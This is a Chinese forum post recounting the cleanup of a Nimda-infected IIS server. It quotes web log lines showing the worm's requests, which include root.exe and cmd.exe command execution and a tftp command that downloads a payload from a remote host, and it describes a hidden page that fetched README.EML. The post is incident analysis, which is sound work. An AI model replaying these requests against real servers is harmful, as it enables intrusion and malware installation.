- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 注册时间
- 2007-1-18
- 最后登录
- 2007-1-18
|
NIMDA病毒接触
[这个贴子最后由damnyou在 2003/07/17 06:05pm 第 10 次编辑]
在帮朋友做机子的时候因为他的机子染了病毒。
IIS还开着的,也是默认设置,那怎么能不染病毒呢。
于是我就看了看日志。其中有这么一段:
2003-06-29 04:25:37 IP - ip 80 GET /scripts/root.exe /c+dir 200 -
2003-06-29 04:27:15 IP - ip 80 GET /MSADC/root.exe /c+dir 403 -
2003-06-29 04:27:20 IP - ip 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-06-29 04:27:26 IP - ip 80 GET /d/winnt/system32/cmd.exe /c+dir 200 -
2003-06-29 04:36:43 IP - ip 80 GET /scripts/root.exe /c+tftp%20-i%20IP%20GET%20cool.dll%20httpodbc.dll 502 -
IP是小日本的,ip是我朋友的。估计就是中NIMDA了。
于是就好解决了,三下五除二就搞定。
我所关注的是这个IP。于是我就上去看了看。原来是默认的页面。估计也是中毒了。我打开网页后出现如图这个页面。
看见了吗?这个隐藏着的页面就是下载病毒体“README.EML”的。结果估计是那个机子把病毒杀掉了的缘故,下载出现了问题。所以本来会一闪而过的,结果就总停留在那儿了。
然后我们打开这个机子默认的页面看了看,马上就找到了病毒修改默认网页留下的恶意代码
这一段是在离本身正常的网页代码很远的地方被病毒添加上去的(估计是怕被发现)。
可惜我现在没这个“readme.eml”的代码。以后有空发上来大家看看。
|
|